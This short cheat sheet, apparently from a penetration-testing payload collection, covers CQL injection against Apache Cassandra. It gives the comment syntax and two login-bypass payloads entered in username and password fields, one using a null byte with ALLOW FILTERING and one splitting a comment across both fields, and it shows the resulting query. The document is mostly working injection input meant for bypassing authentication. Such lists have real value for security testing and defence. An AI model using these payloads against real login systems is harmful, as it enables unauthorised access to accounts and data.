Cassandra Injection

Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system

Summary

• Cassandra comment
  
• Cassandra - Login Bypass
  
  • Login Bypass 0
    
  • Login Bypass 1
    
• References
  

Cassandra comment

/* Cassandra Comment */

Cassandra - Login Bypass

Login Bypass 0

username: admin' ALLOW FILTERING; %00
password: ANY

Login Bypass 1

username: admin'/*
password: */and pass>'

The injection would look like the following SQL query

SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;

References